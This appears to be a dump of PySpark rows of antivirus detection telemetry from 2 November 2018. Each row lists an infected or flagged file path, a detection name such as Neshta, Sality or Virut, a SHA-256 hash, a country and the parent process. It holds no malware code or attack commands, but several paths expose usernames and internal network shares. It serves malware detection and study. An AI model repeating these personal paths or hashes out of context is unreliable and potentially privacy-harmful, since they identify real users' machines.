  Row(detection=Row(filename='sales.exe', filepath='\\\\192.168.27.31\\Networking_Share\\Jessie D\\jessie importante\\jessie\\IO STUFFS\\INVENTORY OFFICER\\PROL\\SALES.exe', filesize=6080000, name='W32/Neshta.A.#M1.#R1'), hash='444f5777b15270dcd76a2eea82ab074978c983421b33f5cb6a175044c070569a', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-02T11:00:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultracas.exe', filepath='\\\\?\\C:\\DATA\\INST\\ZIP\\UltraCAS\\UltraCAS.exe', filesize=64000, name='HEUR/APC.Griffin.#M1.#R1'), hash='447451e81ed5153a5597e8dd9f914ff2ff34977c4abe7bddd2f99905c6272685', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:57:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mssys.exe', filepath='C:\\Windows\\System\\sys\\syscon\\mssys.exe', filesize=1024000, name='APPL/EAMonitor.44e66f.#M1.#R1'), hash='44e66fc342c4470a94caa04d3c0530327391e07636707f007987849a7429dd2c', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System\\sys\\syscon\\mssys.exe', parentsize=1024000, timestamp='2018-11-02T19:04:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mssys.exe', filepath='\\\\?\\C:\\Windows\\System\\sys\\syscon\\mssys.exe', filesize=1024000, name='APPL/EAMonitor.44e66f.#M1.#R1'), hash='44e66fc342c4470a94caa04d3c0530327391e07636707f007987849a7429dd2c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0001093.exe', filepath='f:\\system volume information\\_restore{4e5c790a-6dd2-469c-90c3-c184502b8d66}\\rp1\\A0001093.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='4560979d734bc5a796c5681661277604256d28c5675c17c1946961ac9bf3dc81', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:11:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0000525.exe', filepath='f:\\system volume information\\_restore{08e78a57-b499-42bf-841b-9e69d7dbcbbf}\\rp1\\A0000525.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='4560979d734bc5a796c5681661277604256d28c5675c17c1946961ac9bf3dc81', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:10:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:49:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:56:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:08:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:38:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='45be007a8ae20a92b3dd34e6c9760c9a9fdb69663daaf7b6d5c320636714601b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='45be007a8ae20a92b3dd34e6c9760c9a9fdb69663daaf7b6d5c320636714601b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2640384, timestamp='2018-11-02T04:17:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213249-7fbb5f4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b22022b\\AVSCAN-20181102-213135-7405911C\\AVSCAN-20181102-213249-7FBB5F4A', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:32:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T15:30:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\45C7249BAEEAF3434CE18A12468B50B45F3A759D64E6DA922555D7B684828A59', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\45C7249BAEEAF3434CE18A12468B50B45F3A759D64E6DA922555D7B684828A59', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='45c7249baeeaf3434ce18a12468b50b45f3a759d64e6da922555d7b684828a59', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:34:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vncviewer.exe', filepath='\\\\?\\D:\\GoogleDrive\\156\\WinVNC\\vncviewer.exe', filesize=1024000, name='TR/Patched.Ren.Gen.#M300.#R3368'), hash='4636eea3ecf8b7b97da7ee53eba80a24efc97ec6bce7f9d2f6ea2923827f4a29', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:41:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\46AD39EA3436E1A73207968F8D137F6078072924091B2ECD1EC328687B7E9DE5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:43:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\46AD39EA3436E1A73207968F8D137F6078072924091B2ECD1EC328687B7E9DE5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='46ad39ea3436e1a73207968f8d137f6078072924091b2ecd1ec328687b7e9de5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='46c6770373f0aabfe44f8fce4b21bf2b7aa3f6ce8fe61dd8fa1a492600bfac91', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\lv-LV\\S-1-4-61\\Riched32.dll', filesize=512000, name='TR/AD.CoinMiner.xiiak.#M1.#R1'), hash='47498ba748a0c452242c71a35e56c68137c2d3f3148023287894870dd71886ab', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:48:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nexustk.exe_25c88ee8d81e408c9fb88c09c1e79577.exe', filepath='C:\\Windows\\Installer\\{4D6DE8B6-B0A0-4F2C-BEBE-1FA024E7B951}\\NexusTK.exe_25C88EE8D81E408C9FB88C09C1E79577.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='47bca412c73d6068cf5373d9c2447a99619a7da7c632c9270b9a050af6595930', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T04:23:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nexustk.exe_25c88ee8d81e408c9fb88c09c1e79577.exe', filepath='C:\\Windows\\Installer\\{4D6DE8B6-B0A0-4F2C-BEBE-1FA024E7B951}\\NexusTK.exe_25C88EE8D81E408C9FB88C09C1E79577.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='47bca412c73d6068cf5373d9c2447a99619a7da7c632c9270b9a050af6595930', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T09:30:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hdrwimg.dll', filepath='\\\\?\\F:\\高级数据恢复\\数据恢复软件\\Diskgen\\Diskgen\\HdrwImg.dll', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='47c4cdd9a823919c56f78edcd5f72f820aceb7043253e921c4d9d9a2355d9d6b', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:50:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-211903-9c57afad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7426d2e\\AVSCAN-20181031-233120-EBE69076\\AVSCAN-20181101-211903-9C57AFAD', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='47cfc01081109c4b441cc109030378b73fb44f74a87e4c4a12295cea35c1d899', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-211435-84f7ec5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7426d2e\\AVSCAN-20181031-233120-EBE69076\\AVSCAN-20181101-211435-84F7EC5D', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='47cfc01081109c4b441cc109030378b73fb44f74a87e4c4a12295cea35c1d899', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:15:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='زوم ســـــتار والاشباة.rar', filepath='\\?\\F:\\New folder (3)\\New folder\\18-1-2018\\New folder (2)\\دسك توب 17-11-2017\\14-11-2017\\ملفات جي اكس 11-2017\\احدث ملف قنوات عــــربى بتاريخ 10 11 2017 لاجهزة (Starbox srx150__ZOOMSTAR__Magicsat ms 9650)\\زوم ســـــتار والاشباة.rar', filesize=712000, name='TR/Dropper.Gen.#M300.#R2530'), hash='47d59aca63d5c7f504c0c58f3c499b1b12d7d784d114b9479f9b6b314d92e516', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:35:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reg.exe', filepath='E:\\WINDOWS\\system32\\reg.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='484fe1059b13b83fe1a3d923164822720122717439d4069c9595ee7eb13f51d5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reg.exe', filepath='E:\\WINDOWS\\system32\\reg.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='484fe1059b13b83fe1a3d923164822720122717439d4069c9595ee7eb13f51d5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:59:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='489494dcf2a8596e3d4ec8b6b3f157f9c745394a6f607c6890ab344191ae8261.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\489494DCF2A8596E3D4EC8B6B3F157F9C745394A6F607C6890AB344191AE8261.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='489494dcf2a8596e3d4ec8b6b3f157f9c745394a6f607c6890ab344191ae8261', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:42:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='74e3f8080e97e05bfe24a99eb562a7d9', filepath='c:\\$recycle.bin\\s-1-5-21-1065681938-136227472-3706928249-1000\\$r00gqtw\\74e3f8080e97e05bfe24a99eb562a7d9', filesize=896000, name='HEUR/AGEN.1000251.#M15.#R1000251'), hash='48f6ba8487d17bf9829f914953b1b10b2542c7c653605f6fd92cdfdf90fd3b46', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:44:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='utilman.exe', filepath='E:\\WINDOWS\\ServicePackFiles\\i386\\utilman.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='4902ac343fff8549e4d76c4c80cc017e021345e753ebf341a575dcfbf398ed57', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:56:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='utilman.exe', filepath='E:\\WINDOWS\\ServicePackFiles\\i386\\utilman.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='4902ac343fff8549e4d76c4c80cc017e021345e753ebf341a575dcfbf398ed57', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:38:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161250-fc16dd41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d03467a9\\AVSCAN-20181102-161224-F7C6D479\\AVSCAN-20181102-161250-FC16DD41', filesize=128000, name='TR/Patched.Ren.Gen.#M1.#R1'), hash='4907717a484cf9f641a48a8c9529c911cca64b82a232d48c27db83f6427d27fa', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:13:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unrhino.exe', filepath='\\\\192.168.1.6\\圖面資訊\\Rhinoceros 1.1 Evaluation\\UNRHINO.EXE', filesize=128000, name='HEUR/Patched.Ren.#M1.#R1'), hash='4907717a484cf9f641a48a8c9529c911cca64b82a232d48c27db83f6427d27fa', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4848960, timestamp='2018-11-02T08:11:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='etabs_2015.exe', filepath='C:\\Users\\X\\Downloads\\download\\CSI ETABS 2015 version 15.0.0.1221 [32-64 Bit] - [FirstUploads]\\32-Bit\\License Generator\\etabs_2015.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe10_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe10 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:55:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144153-97355f69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea22c0d5\\AVSCAN-20181102-144128-94472639\\AVSCAN-20181102-144153-97355F69', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105759-84b3e8b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dd051c61\\AVSCAN-20181102-105745-8243A86F\\AVSCAN-20181102-105759-84B3E8B8', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:28:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='etabs_2015.exe', filepath='C:\\Program Files\\Computers and Structures\\ETABS 2015\\CSiLicensing\\etabs_2015.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:zaxfyQAmgkeVHgV\\\\\\/.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:24:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='license generator_downloadly.exe', filepath='E:\\Nava\\Programs\\Etabs 2015\\Crack\\License Generator_DownLoadLy.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='--engine=2 --session-id=mCBIIkrDL0LwxRT0ZURvfXP4PtaIuem04qHzWKRm --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T15:40:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131314-5239a2dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d3a2052\\AVSCAN-20181102-131238-4E3F2C2C\\AVSCAN-20181102-131314-5239A2DD', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T20:13:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keygen.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXb0.350\\Keygen\\Keygen.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=49664, timestamp='2018-11-02T20:12:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\InstallShield Installation Information\\{B773B178-2C91-4E90-A082-F2875AAEAF48}\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='493dc4bf0e6a9129419a5aa5577db34c925260c8f9eb25f4ba3aa31ed5d26e27', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3709256, timestamp='2018-11-02T20:08:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:23:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:44:33Z'), dt=datetime.date(2018, 11, 2)),
  ...],
 [Row(detection=Row(filename='dup2patcher.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dup2patcher.dll', filesize=384000, name='SPR/Hacktool.002b10.#M1.#R1'), hash='002b106a99023edc62a5bd957b6276646a15a36c45cf1aa798f74aceb4f9c504', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Patch\\Patch.exe', parentsize=390656, timestamp='2018-11-02T14:20:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\Outlander PHEV\\TOOL\\MSV\\ENV\\MSVE\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='00d0a73c885e1d7b9978b3d9204e754e9625a0ef15d3e1dccf8c2443cfe1c6c4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wab.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\wab.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='014d681f318edb59f382a127c9c252588c7e6213e544ec176752c576e57a64d5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:12:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wab.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\wab.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='014d681f318edb59f382a127c9c252588c7e6213e544ec176752c576e57a64d5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xuetr.exe', filepath='E:\\HBCD\\Programs\\XueTr.exe', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082954-ab610b30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-082954-AB610B30', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221444-585e2577', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221444-585E2577', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:42Z'), dt=datetime.date(2018, 11, 2)),
